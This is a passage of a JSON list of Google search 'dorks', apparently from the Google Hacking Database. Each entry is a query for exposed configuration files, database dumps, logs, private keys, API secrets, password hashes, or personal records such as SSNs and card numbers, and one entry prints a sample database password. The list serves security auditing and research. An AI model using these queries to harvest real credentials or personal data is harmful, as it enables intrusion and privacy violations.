"Dork: intitle:\"index of\" \"auth_config.php\"\r\nDescription: This google dorks lists out authentication config files on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"aws-config.php\"", "description": "Dork: intitle:\"index of\" \"aws-config.php\"\r\nDescription: This google dorks lists out aws config files on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "intitle:\"index of\" \"auth.config\"", "description": "Dork: intitle:\"index of\" \"auth.config\"\r\nDescription: This google dorks lists out authentication config files on web servers.\r\nAuthor: Abhi Chitkara"}, {"dork": "\"index of\" \"sshd_config\"", "description": "# Google Dork: \"index of\" \"sshd_config\"\r\n# Title: Configuration files disclosure.\r\n# Date: 04/06/2020\r\n# Author: Bhaskar Kumar"}, {"dork": "\"index of\" /ftp/logs", "description": "# Title: Finding potential log files.\r\n# Google Dork: \"index of\" /ftp/logs\r\n# Date: 04/06/2020\r\n# Author: Ritik Sahni"}, {"dork": "\"index of\" /private/logs", "description": "# Google Dork: \"index of\" /private/logs\r\n# Title: Finding potential log files.\r\n# Date: 04/06/2020\r\n# Author: Ritik Sahni"}, {"dork": "allinurl:index.php?db=information_schema", "description": "Google Dork : allinurl:index.php?db=information_schema\r\n\r\nDescription :\r\n\r\nThis dork bypasses the admin username and password and takes you directly\r\nto information schema table and you can delete data!\r\n\r\nAuthor : Anjali\r\n\r\nLinkedin Profile link : https://www.linkedin.com/in/anjali-p-44ab20133/"}, {"dork": "filetype:sql intext: \"sql dump\"", "description": "filetype:sql intext: \"sql dump\"\r\n\r\nSensitive Sql dump files in various domains"}, {"dork": "\"index of\" \"user.sqlite\"", "description": "# Google Dork: \"index of\" \"user.sqlite\"\r\n# Title: SQLite files disclosure.\r\n# Date: 04/06/2020\r\n\r\n# Author: Shivani Kumari\r\n# LinkedIn: https://www.linkedin.com/in/shivani1337/\r\n# Twitter: https://twitter.com/Shivani1337\r\n# GitHub: https://github.com/Shivani1337\r\n# Bugcrowd: https://bugcrowd.com/Shivani1337\r\n\r\n_\r\nThank you,\r\nShivani Kumari"}, {"dork": "intitle:\"index of\" \"wp-admin.zip\"", "description": "*Dork:* intitle:\"index of\" \"wp-admin.zip\"\r\n*Description:* This Google dork can be used to discover publicly available\r\nZIP files containing wp-admin.php file which has sensitive WordPress\r\nInformation.\r\n*Author:* Hemant Patidar (HemantSolo)\r\n*Linkedin: *https://www.linkedin.com/in/hemantsolo/"}, {"dork": "DORK : intext:\"index of\" \"var/log/\"", "description": "Dork : intext:\"index of\" \"var/log/\"\r\n\r\nDescription: This Google dork shows juicy information about different logs\r\nused by the website. Logs like connector.log, debug log,system.log,\r\nexception.log, etc\r\n\r\nThanks and regards\r\nAnil Tom"}, {"dork": "\"microsoft internet information services\" ext:log", "description": "Files containing juicy info:\r\n\r\n\"microsoft internet information services\" ext:log\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "index of \"backup.zip\"", "description": "Google Dork: index of \"backup.zip\"\r\nAuthor: Hemant Patidar (HemantSolo)\r\nLinkedin: https://www.linkedin.com/in/hemantsolo/"}, {"dork": "inurl:admin intitle:index of ext:sql | xls | xml | json | csv", "description": "# Title: Sensitive Data Exposure\r\n# Google Dork: inurl:admin intitle:index of ext:sql | xls | xml | json | csv\r\n# Date: 2020-06-06\r\n\r\n# Author: Bhaskar Kumar\r\n# LinkedIn: https://www.linkedin.com/in/haxonic/\r\n\r\n_\r\nRegards,\r\nTeam HAXONIC"}, {"dork": "\"phpMyAdmin MySQL-Dump\" \"INSERT INTO\" -\"the\"", "description": "# Dork: \"phpMyAdmin MySQL-Dump\" \"INSERT INTO\" -\"the\"\r\n\r\nThank you\r\nAshish More"}, {"dork": "\"root.log\" ext:log", "description": "# Google Dork: \"root.log\" ext:log\r\n# Juicy information and sensitive directories.\r\n# Date: 2020-06-09\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"dev/config\"", "description": "Dork: intitle:\"index of\" \"dev/config\"\r\nCategory: Files Containing Juicy Info\r\nInfo: This Google Dork lists out config folders/files on web servers\r\n\r\nExploit Author: Mayank Raheja\r\n\r\nThanks! Looking forward to your response.\r\nRegards,\r\nMayank Raheja"}, {"dork": "index of \"logs.zip\"", "description": "# Dork:- index of \"logs.zip\"\r\n# Impact:- Files Containing Juicy Info\r\n\r\nThank you\r\n\r\n\r\n\r\n\r\n\r\n\r\nAuthor:- Shivansh Kumar\r\nIndependent security researcher\r\nIndia"}, {"dork": "index of \"dbbackup\"", "description": "Dork: index of \"dbbackup\"\r\nCategory: Files Containing Juicy Info\r\nInfo: This Google Dork lists out backup folders/files on web servers\r\n\r\nExploit Author: Mayank Raheja\r\n\r\nThanks! Looking forward to your response.\r\nRegards,\r\nMayank Raheja"}, {"dork": "intitle:\"index of /\" \"nginx.conf\"", "description": "intitle:\"index of /\" \"nginx.conf\"\r\n\r\nBY\r\n\r\nSagar Banwa"}, {"dork": "\"Index of\" \"customer.php\"", "description": "Google Dork: \"Index of\" \"customer.php\"\r\n\r\nCategory: Files Containing Juicy Info\r\n\r\nAuthor: Prashant Sharma\r\n\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intitle:index.of.?.db", "description": "Dor: intitle:index.of.?.db\r\nDescription: Used to find database of different websites\r\n\r\n-- \r\nWith Regards,\r\nAkhil G Krishnan"}, {"dork": "\"index of sqlite\"", "description": "# Google Dork: \"index of sqlite\"\r\n# Title: SQLITE file disclosure\r\n# Date: 06/06/2020\r\n# Author: Mahesh Rai\r\n# LinkedIn: https://www.linkedin.com/in/mahesh-rai\r\n# Bugcrowd: https://bugcrowd.com/Mahesh_Rai"}, {"dork": "intext:\"index of /\" \"config.json\"", "description": "Google Dork: intext:\"index of /\" \"config.json\"\r\nDork Title: Files Containing Juicy Info\r\nDork Author: Abinesh kamal K U"}, {"dork": "index of .svn/text-base/index.php.svn-base", "description": "Dork: index of .svn/text-base/index.php.svn-base"}, {"dork": "intitle:\"index of\" admin.tar", "description": "Dork: intitle:\"index of\" admin.tar\r\nDescription: This google dorks lists out default admin folders on web\r\nservers\r\nAuthor: Abhi Chitkara"}, {"dork": "intext:\"index of /\" \"*.yaml\"", "description": "Google Dork: intext:\"index of /\" \"*.yaml\"\r\nDork Title: Files Containing Juicy Info\r\nDork Author: Abinesh kamal K U\r\n\r\n\r\n-- \r\nAbinesh Kamal K U"}, {"dork": "\"index of\" \"siri\"", "description": "Google Dork: \"index of\" \"siri\"\r\nCategory: Files Containing Juicy Info\r\nAuthor: Prashant Sharma\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intitle:\"index of\" secrets.yml", "description": "Dork: intitle:\"index of\" secrets.yml\r\nDate: 2020-06-15\r\n\r\nby\r\n\r\nkrushna Lipane"}, {"dork": "intitle:\"index of /\" \"*key.pem\"", "description": "# Dork :intitle:\"index of /\" \"*key.pem\"\r\n# Sensitive informations : Private Keys\r\n# Author : Ambadi MP"}, {"dork": "index of /backend/prod/config", "description": "Dork: index of /backend/prod/config\r\nDescription : Files Containing Juicy Info\r\nAuthor : Rahul Parmar"}, {"dork": "\"Index of\" \"/access\"", "description": "Google Dork: \"Index of\" \"/access\"\r\nCategory: Files containing Juicy Info\r\nAuthor: Prashant Sharma\r\nLinkedIn: https://www.linkedin.com/in/prashantique/"}, {"dork": "intext:\"Not to be distributed\" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx", "description": "# Google Dork: intext:\"Not to be distributed\" ext:doc OR ext:pdf OR ext:xls OR ext:xlsx\r\n# Sensitive stuff.\r\n# Date: 17/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "Index of /__MACOSX/System", "description": "# Dork: Index of /__MACOSX/System\r\n# Name: Deepak Kumar Bharti\r\n# Description: Will show some juicy information related to Parent directory\r\n# and details."}, {"dork": "intitle:\"index of\" \"id_rsa.pub\"", "description": "# Dork: intitle:\"index of\" \"id_rsa.pub\"\r\n# Author: Sid Joshi\r\n# Result of this dorks contains Sensitive Directories with juicy ssh keys.\r\n\r\n# POC in attachment\r\n\r\n# Thanks!"}, {"dork": "intitle:\"index of\" /etc/openvpn/", "description": "# Google Dork: intitle:\"index of\" /etc/openvpn/\r\n# Juicy information and sensitive directories.\r\n# Date: 26/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"*named.root.key\"", "description": "# Google Dork: intitle:\"index of\" \"*named.root.key\"\r\n# Juicy information and sensitive directories.\r\n# Date: 26/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" ./bash_history", "description": "# Google Dork: intitle:\"index of\" ./bash_history\r\n# Juicy info and sensitive directories.\r\n# Date: 30/06/2020\r\n# Author: Alexandros Pappas"}, {"dork": "\"-----BEGIN RSA PRIVATE KEY-----\" inurl:id_rsa", "description": "Dork: \"-----BEGIN RSA PRIVATE KEY-----\" inurl:id_rsa\r\nDescription: Some hashes (passwords, certs, etc.)\r\nAuthor: Sandeep Kumar"}, {"dork": "\"Index of\" \"accounts.sql\"", "description": "Title: Containing juicy info\r\nGoogle Dork: \"Index of\" \"accounts.sql\"\r\nDate: 28/06/2020\r\nAuthor : Mohit khemchandani"}, {"dork": "intitle:\"index of\" \"bundle.pem\"", "description": "# Google Dork: intitle:\"index of\" \"bundle.pem\"\r\n# Juicy information and sensitive directories.\r\n# Date: 26/06/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Index of /\" \"joomla/database\"", "description": "Dork: intitle:\"Index of /\" \"joomla/database\"\r\n\r\nThis google dork gives us about joomla related database files and source\r\ncode related to websites running joomla it will also expose directory\r\nlisting of websites\r\n\r\nThanks\r\nNaveenKumar"}, {"dork": "intitle:\"report\" (\"qualys\" | \"acunetix\" | \"nessus\" | \"netsparker\" | \"nmap\") filetype:html", "description": "Description : intitle:\"report\" (\"qualys\" | \"acunetix\" | \"nessus\" |\r\n\"netsparker\" | \"nmap\") filetype:html\r\n\r\nThis dork allows identification and detection of\r\nvulnerabilities arising from mis-configurations or flawed programming\r\nwithin a network-based asset such as a firewall, router, web server,\r\napplication server, etc from already scanned reports.\r\n\r\n*This html version is giving more reports of top companies than the PDF\r\nversion. please find the screenshots and compare with the pdf version.*\r\n\r\nThanks,\r\nSachin"}, {"dork": "intitle:\"report\" (\"OpenVAS\" | \"Nikto\") ext:pdf OR ext:html", "description": "# Google Dork: intitle:\"report\" (\"OpenVAS\" | \"Nikto\") ext:pdf OR ext:html\r\n# OpenVAS and Nikto vulnerability reports.\r\n# Date: 8/07/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"report\" (\"Fortify\" | \"Web Inspect\") filetype:pdf", "description": "# Google Dork: intitle:\"report\" (\"Fortify\" | \"Web Inspect\") filetype:pdf\r\n# Date: 08-07-2020\r\n\r\n#Description: This Google Dork allows retrieving reports of scanned\r\nsites thereby identifying vulnerabilities and misconfigurations\r\npresent in an application/website.\r\n# Exploit Author: S Suhas"}, {"dork": "intitle:\"index of\" exception.log", "description": "Description : intitle:\"index of\" system.log\r\n\r\nThe Google dork of intitle:\"index of\" system.log gives juicy information of\r\nhtdocs present in the respective url."}, {"dork": "allintext:username,password filetype:log", "description": "allintext:username,password filetype:log"}, {"dork": "intext:ISUR_MACHINE IIS -log", "description": "Dork: intext:ISUR_MACHINE IIS -log\r\nDescription: Error messages \r\nAuthor: Priyanka Prasad"}, {"dork": "intitle:\"index of\" jboss-service.xml", "description": "Description : intitle:\"index of\" jboss-service.xml\r\n\r\nThe Google dork of intitle:\"intitle:\"index of\" jboss-service.xml gives\r\njuicy information of JBoss Application Server\r\n\r\nAuthor:- Anurag Kumar"}, {"dork": "\"Reflector Dashboard\" inurl:/db/index.php/", "description": "# Google Dork: \"Reflector Dashboard\" inurl:/db/index.php/\r\n\r\n# Juicy info about Radio Amateur Dashboards.\r\n\r\n# Date: 28/07/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:\"API_SECRET*\" ext:env | ext:yml", "description": "# Google Dork: allintext:\"API_SECRET*\" ext:env | ext:yml\r\n# Juicy info.\r\n# Date: 10/08/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"index of\" \"user.MYD\"", "description": "# Google Dork: \"index of\" \"user.MYD\"\r\n# Title: Disclosure of sensitive files.\r\n# Date: 15/08/2020\r\n# Author: Sahil Saxena\r\n# LinkedIn: https://www.linkedin.com/in/sahil-saxena-1333b9174\r\n# Twitter: https://twitter.com/Sahil_delinitor\r\n# GitHub: https://github.com/Sahil-69\r\n# Bugcrowd: https://bugcrowd.com/Prickn\r\n\r\nThanks,\r\nSahil Saxena"}, {"dork": "ext:log intext:NetworkManager \"systemd\"", "description": "Google Dork: ext:log intext:NetworkManager \"systemd\"\r\nBy using this dork one can list the indexed log files present on the\r\ninternet. This dork basically fetches either juicy information from the\r\nlogs or if lucky whole log files.\r\n\r\nPlease review my submission towards GHDB. I look forward to your response.\r\n\r\nRegards!\r\nMayank Sharma"}, {"dork": "intext:admin ext:sql inurl:admin", "description": "*Google Dork:* intext:admin ext:sql inurl:admin\r\n\r\n*Description:*With the extension sql and intext admin and inurl admin, I\r\nwas able to look into some of the admin sql files and even sql queries\r\ndirectly that reveals lots of sensitive information like login id, password\r\nin clear text. .\r\n\r\n*Author:* Anshul T\r\n\r\nThanks,\r\nAnshul T"}, {"dork": "site:ftp://ftp.*.* ext:sql", "description": "Dork: site:ftp://ftp.*.* ext:sql\r\nFiles containing Juicy info:\r\n\r\nsite:ftp://ftp.*.* ext:sql\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "\"index of\" \"callback.php\"", "description": "Google Dork: \"index of\" \"callback.php\"\r\nCategory: Files Containing Juicy Info\r\nAuthor: Prashant Sharma (@Prashantique)\r\nLinkedIn: https://www.linkedin.com/in/prashantique"}, {"dork": "intitle:\"index of\" \"composer.lock\"", "description": "Description : intitle:\"index of\" \"composer.lock\"\r\n\r\nThis google dork gives us the composer.lock file and sensitive details\r\nof misconfigured servers."}, {"dork": "'AUTH_SALT' | 'SECURE_AUTH_SALT' | 'LOGGED_IN_SALT' | 'NONCE_SALT' ext:txt | ext:cfg | ext:env | ext:ini", "description": "# Google Dork: 'AUTH_SALT' | 'SECURE_AUTH_SALT' | 'LOGGED_IN_SALT' | 'NONCE_SALT' ext:txt | ext:cfg | ext:env | ext:ini\r\n# MySQL database usernames and passwords, and SALT values....\r\n# Date: 1/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "Database:phpmyadmin intext:mysql ext:sql inurl:phpmyadmin", "description": "Dorks: Database:phpmyadmin intext:mysql ext:sql inurl:phpmyadmin\r\n\r\nSummary:\r\nA Google dork that gives the PHPMyAdmin creates table information\r\nconfigutation.\r\n\r\n-- \r\nThanks & Regards,\r\nPrasad Lingamaiah"}, {"dork": "intitle:\"index of\" \"phpmyadmin.sql\"", "description": "Files containing Juicy info:\r\n\r\nintitle:\"index of\" \"phpmyadmin.sql\"\r\n\r\nBR,\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"config.db\"", "description": "Dork: intitle:\"index of\" \"config.db\"\r\n\r\nShow files containing juicy info"}, {"dork": "\"putty.log\" ext:log | ext:cfg | ext:txt", "description": "# Google Dork: \"putty.log\" ext:log | ext:cfg | ext:txt\r\n# Putty logs containing juicy info.\r\n# Date: 18/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"mysql.log\" | \"mysql.logs\"", "description": "# Google Dork: intitle:\"index of\" \"mysql.log\" | \"mysql.logs\"\r\n# Files containing juicy info.\r\n# Date: 24/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"Environment Variables\" inurl:/cgi-bin/", "description": "Google Dork: intitle:\"Environment Variables\" inurl:/cgi-bin/\r\n\r\nDescription: This Google Dork is used for listing \"Environment Variables\"\r\nscript which is a CGI script that lists sensitive information such as the\r\npath names, server names, port numbers, server software, version numbers,\r\nadministrator email addresses etc all these juicy information can be\r\nobtained.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "\"UV9 Error (1.0)\"", "description": "Find error pages referring to the E-Vision Web-app. Can sometimes\r\ncontain juicy information.\r\n\r\n- Strontium"}, {"dork": "allintext:\"index of\" \"oauth-private.key\"", "description": "Dear Team,\r\n\r\n# Exploit Title: allintext:\"index of\" \"oauth-private.key\"\r\n# Google Dork: allintext:\"index of\" \"oauth-private.key\"\r\n# Exposed Oauth Private Keys\r\n# Date: 14/10/2020\r\n# Exploit Author: Sajan Dhakate\r\n\r\nPlease find the attached txt file.\r\n\r\n*Thanks & Regards*\r\n*Sajan Dhakate*"}, {"dork": "intitle:\"PowerMTA\" inurl:logs", "description": "Files Containing Juicy Info\r\n\r\n# Google Dork: intitle:\"PowerMTA\" inurl:logs\r\n# Date: 10/15/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*"}, {"dork": "\"index of\" \"/home/000~ROOT~000/etc\"", "description": "Google Dork: \"index of\" \"/home/000~ROOT~000/etc\"\r\n\r\nDescription: Juicy Information and Sensitive Directories.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "allintext:\"Index Of\" \"cookies.txt\"", "description": "# Exploit Title: *allintext:\"Index Of\" \"cookies.txt\"*\r\n# Google Dork: *allintext:\"Index Of\" \"cookies.txt\"*\r\n# Juicy information : Valuable cookie information.\r\n# Date: 25/10/2020\r\n# Exploit Author: Sajan Dhakate\r\n\r\n*Thanks & Regards*\r\n*Sajan Dhakate*"}, {"dork": "ext:txt | ext:log | ext:cfg | ext:yml \"administrator:500:\"", "description": "# Google Dork: ext:txt | ext:log | ext:cfg | ext:yml \"administrator:500:\"\r\n\r\n# Various Windows SAM hashed Administrator hashes...\r\n\r\n# Date: 24/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/xampp/htdocs\" | \"C:/xampp/htdocs/\"", "description": "# Google Dork: intitle:\"index of\" \"/xampp/htdocs\" | \"C:/xampp/htdocs/\"\r\n# Sensitive directories.\r\n# Date: 10/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"* Authentication Unique Keys and Salts\" ext:txt | ext:log", "description": "# Google Dork: \"* Authentication Unique Keys and Salts\" ext:txt | ext:log\r\n\r\n# Authentication Unique Keys and Salts and more....\r\n\r\n# Date: 2/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"-- Server version\" \"-- MySQL Administrator dump 1.4\" ext:sql", "description": "# Google Dork: \"-- Server version\" \"-- MySQL Administrator dump 1.4\" ext:sql\r\n\r\n# Files Containing Juicy Info. MySQL dumps, sometimes containing usernames,\r\npasswords and other stuff\r\n\r\n# Date: 27/10/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:*gov.* intitle:index.of db", "description": "# Title: Database Disclosure for specific domain\r\n# Google Dork: site:*gov.* intitle:index.of db\r\n# Date: 1/10/2020\r\n# Author: Prajwal Khante"}, {"dork": "intitle:\"index of\" \"service-Account-Credentials.json\" | \"creds.json\"", "description": "# Google Dork: intitle:\"index of\" \"service-Account-Credentials.json\" | \"creds.json\"\r\n# Sensitive directories containing private keys, private key IDs, etc..\r\n# Date: 5/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"/.idea\"", "description": "# Google Dork: intitle:\"index of\" \"/.idea\"\r\n# Sensitive directories containing juicy info and sometimes usernames and passwords.\r\n# Date: 27/10/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" intext:credentials", "description": "#Google Dork: intitle:\"index of\" intext:credentials\r\n#Files Containing Juicy Info\r\n#Author: Mohammed Saneem"}, {"dork": "Index of /_vti_pvt +\"*.pwd\"", "description": "# Google Dork: Index of /_vti_pvt +\"*.pwd\"\r\n# Sensitive directories containing juicy information and usernames and passwords.\r\n# Date: 9/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:gov ext:sql | ext:dbf | ext:mdb", "description": "# Google Dork: site:gov ext:sql | ext:dbf | ext:mdb\r\n# sensitive uploaded contents from websites\r\n# Author : ANURAG K P"}, {"dork": "intitle:\"index of\" \"Clientaccesspolicy.xml\"", "description": "Files containing Juicy info:\r\n\r\nintitle:\"index of\" \"Clientaccesspolicy.xml\"\r\n\r\n\r\n\r\nBR,\r\nReza Abasi(Turku)\r\nIranian cyber sec researcher"}, {"dork": "\"secret_key_base:\" ext:exs | ext:txt | ext:env | ext:cfg", "description": "# Google Dork: \"secret_key_base:\" ext:exs | ext:txt | ext:env | ext:cfg\r\n# Sensitive directories containing juicy information.\r\n# Date: 12/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:sql | ext:txt intext:\"-- phpMyAdmin SQL Dump --\" + intext:\"admin\"", "description": "# Google Dork: ext:sql | ext:txt intext:\"-- phpMyAdmin SQL Dump --\" + intext:\"admin\"\r\n# Files containing juicy info...\r\n# Date: 19/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"putty.log\" ext:log | ext:cfg | ext:txt | ext:sql | ext:env", "description": "#Exploit Title : Putty logs containing juicy info.\r\n#Google Dork : \"putty.log\" ext:log | ext:cfg | ext:txt | ext:sql | ext:env\r\n#Date : 18/11/2020\r\n#Exploit Author : Sanu Jose M\r\n\r\nThanks & Regards,\r\n\r\nSanu Jose M"}, {"dork": "ext:php intitle:phpinfo \"published by the PHP Group\"", "description": "#Google Dork: ext:php intitle:phpinfo \"published by the PHP Group\"\r\n# sensitive login page with extension like spl,dbf,mdb\r\n# Author : ANURAG K P"}, {"dork": "intitle:\"index of\" intext:\"web.xml\"", "description": "# Dork: intitle:\"index of\" intext:\"web.xml\"\r\n# This dork looks for a directory listing that contains web.xml. The file is a deployment descriptor that defines mappings between URLs and servlets.\r\n# For more information on web.xml:\r\n# https://docs.oracle.com/cd/E24329_01/web.1211/e21049/web_xml.htm#WBAPP502\r\n# It can be leveraged to identify additional pages/URIs on a webserver. A use case for example is on Apache Tomcat.\r\n\r\nCategory: Files Containing Juicy Info\r\nSubmitted by stmxcsr"}, {"dork": "ext:txt | ext:log | ext:cfg \"Building configuration...\"", "description": "# Google Dork: ext:txt | ext:log | ext:cfg \"Building configuration...\"\r\n# Cisco configuration files containing juicy information and many times passwords.\r\n# Date: 20/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:yml | ext:txt | ext:env \"Database Connection Information Database server =\"", "description": "# Google Dork: ext:yml | ext:txt | ext:env \"Database Connection Information\r\nDatabase server =\"\r\n\r\n# Files containing juicy information.\r\n\r\n# Date: 3/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "\"The SQL command completed successfully.\" ext:txt | ext:log", "description": "# Google Dork: \"The SQL command completed successfully.\" ext:txt | ext:log\r\n\r\n# Files containing juicy information.\r\n\r\n# Date: 3/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "inurl:\"/php/info.php\" \"PHP Version\"", "description": "# Google Dork: inurl:\"/php/info.php\" \"PHP Version\"\r\n\r\n# Pages containing juicy info.\r\n\r\n# Date: 16/12/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "site:ftp.*.*.* \"ComputerName=\" + \"[Unattended] UnattendMode\"", "description": "# Google Dork: site:ftp.*.*.* \"ComputerName=\" + \"[Unattended] UnattendMode\"\r\n# Files containing juicy info.\r\n# Date: 24/12/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintext:@gmail.com filetype:log", "description": "# Author: - Rushabh Doshi (https://www.linkedin.com/in/rushabh1998)\r\n# Category: - juicy information\r\n# Description: - This dork returns the logs which contains sensitive information like email addresses, timestamp and passwords\r\n# Google Dork: - allintext:@gmail.com filetype:log\r\n# Date: - 26/12/2020"}, {"dork": "inurl:https://trello.com AND intext:@gmail.com AND intext:password", "description": "# Author: - Rushabh Doshi\r\n# Category: - juicy information\r\n# Description: - This dork returns the vulnerable firebase database links which contains sensitive information like email addresses or other details about android app using firebase as a database\r\n# Google Dork: - inurl:https://trello.com AND intext:@gmail.com AND intext:password\r\n# Date: - 21/12/2020\r\n\r\nThanks & Regards"}, {"dork": "intitle:\"index of\" intext:\"apikey.txt", "description": "#Google Dork intitle:\"index of\" intext:\"apikey.txt\" \r\n#Files Containing Juicy info\r\n#Author Mohammed Saneem"}, {"dork": "filetype:log inurl:paypal", "description": "# Author: - Hank Fordham\r\n# Category: - juicy information\r\n# Description: - This dork returns the logs which contains sensitive information like email addresses, timestamp etc.\r\n# Google Dork: - filetype:log inurl:paypal\r\n# Date: - 01/18/2021"}, {"dork": "intitle:final.attendee.list | inurl:final.attendee.list", "description": "# Google Dork: intitle:final.attendee.list | inurl:final.attendee.list\r\n\r\n# Juicy info.\r\n\r\n# Date: 18/1/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "ext:xlsx inurl:database", "description": "# Google Dork: ext:xlsx inurl:database\r\n# Date: 15/01/2021\r\n# Information of database with .xlsv extension\r\n\r\n# Author:Raj Zamal"}, {"dork": "ext:(doc | pdf | xls | txt |) (intext:confidential salary) inurl:confidential", "description": "Dork: ext:(doc | pdf | xls | txt |) (intext:confidential salary) inurl:confidential\r\n\r\nCategory : Files Containing Juicy Info\r\nAuthor: Naved Shaikh"}, {"dork": "intitle:\"index of\" \"application.properties\"", "description": "*Google Dork: intitle:\"index of\" \"application.properties\"*\r\n*Exploit Author: Parth Shukla*\r\n\r\n*Example: *\r\nspring.mvc.view.prefix=/WEB-INF/views/spring.mvc.view.suffix=.jspspring.datasource.url=jdbc:mysql://localhost:3306/componente_c?allowPublicKeyRetrieval=true&useSSL=falsespring.datasource.username=rootspring.datasource.password=KG3fi57HsauW9#\r\n\r\nThank you,\r\nParth Shukla"}, {"dork": "inurl:\"dcwp_twitter.php\"", "description": "Google dork description: Dork to find sites likely running Social Network\r\nTabs plugin 1.7.1 for WordPress and likely affected by CVE-2018-20555 which\r\nallows remote attackers to discover Twitter access_token,\r\naccess_token_secret, consumer_key, and consumer_secret values by reading\r\nthe dcwp_twitter.php source code. This leads to Twitter account takeover.\r\n\r\nGoogle Search: inurl:\"dcwp_twitter.php\"\r\n\r\nSubmitted by: Alfie\r\n\r\nTwitter: https://twitter.com/emenalf\r\n\r\nWebsite: https://the-infosec.com\r\n\r\n-- \r\nRegards,\r\nAlfie.\r\nthe-infosec.com"}, {"dork": "intitle:\"index of\" \"secret.yaml\"", "description": "# Google Dork: intitle:\"index of\" \"secret.yaml\"\r\n# Description: K8s secret objects containing private data in base64 encoded\r\nformat (username, passwords, certificates, private keys, etc)\r\n# Exploit author: Vladimir Remenar"}, {"dork": "inurl:ftp -inurl:(http|https) intext:\"@gmail.com\" intext:subject fwd|confidential|important|CARD|cvv", "description": "# Dork: inurl:ftp -inurl:(http|https) intext:\"@gmail.com\" intext:subject fwd|confidential|important|CARD|cvv\r\n# Author: Aigo\r\n# Description: archived email conversations at times revealing full credit\r\n# card numbers and customer information as well as private company email\r\n# conversations."}, {"dork": "intext:cv OR intext:curriculum vitae AND intext:\"SSN\" ext:doc", "description": "intext:cv OR intext:curriculum vitae AND intext:\"SSN\" ext:doc \r\n\r\n# Google Dork: CV and SSN dork \r\n# Date: 18/03/21 \r\n# Author: cybersecstu\r\n\r\n\r\n Stu- Co-FounderTHE MANY HATS CLUB\r\nhttps://themanyhats.club@themanyhatsclub\r\n@cybersecstu"}, {"dork": "\"Parent Directory\" AND \"Index of\" AND \"config.php_old\"", "description": "# Google Dork: \"Parent Directory\" AND \"Index of\" AND \"config.php_old\"\r\n# Date: 20/03/2021\r\n# Exploit Author: Cuma KURT\r\n# Files Containing Juicy Info\r\n# The backup PHP config files reveal passwords and other important data.\r\n\r\nCuma KURT\r\n*Ethical Hacker | Information Security Engineer\r\nIstanbul - Turkey"}, {"dork": "intext:\"Your client connection\" + \"Network name\" + \"Hardware address\"", "description": "# Google Dork: intext:\"Your client connection\" + \"Network name\" + \"Hardware address\"\r\n\r\n# Cisco Meraki configuration panels with juicy info...\r\n\r\n# Date: 8/04/2021\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"google-services.json\"", "description": "# Google Dork: intitle:\"index of\" \"google-services.json\"\r\n\r\n# File containing juicy info\r\n\r\n# Exploit Author: Dinesh Kumar"}, {"dork": "intitle:\"Index of\" ws_ftp.ini", "description": "Discription : The \"ws_ftp.ini\" file may contain usernames and passwords of\r\nFTP users. It may also displays parent directory."}, {"dork": "intitle:\"index of\" intext:\"senha\"", "description": "# Exploit Title: Files Containing Juicy Info\r\n# Google Dork: intitle:\"index of\" intext:\"senha\"\r\n# Date: 2021-05-21\r\n# Exploit Author: Aniket Prabhakar"}, {"dork": "site:.gov.co intitle:Index of", "description": "# Google Dork: site:.gov.co intitle:Index of\r\n\r\n# Files Containing Juicy Info\r\n\r\n# Date: 03/06/2021\r\n\r\n# Exploit Author: Om Satyarthi"}, {"dork": "site:*/phpmyadmin/server_sql.php", "description": "Files Containing Juicy info:\r\n\r\n\r\nsite:*/phpmyadmin/server_sql.php\r\n\r\nBR,\r\nReza Abasi (Turku)\r\nCyber Sec researcher"}, {"dork": "site:*/phpmyadmin/server_privileges.php", "description": "# Dork: Files Containing Juicy info:\r\n\r\n\r\nsite:*/phpmyadmin/server_privileges.php\r\nBR,\r\nReza Abasi (Turku)\r\nCyber Sec researcher"}, {"dork": "inurl:phpmyadmin/sql.php?server=1", "description": "Files Containing Juicy info:\r\n\r\ninurl:phpmyadmin/sql.php?server=1\r\n\r\nBR,\r\nReza Abasi 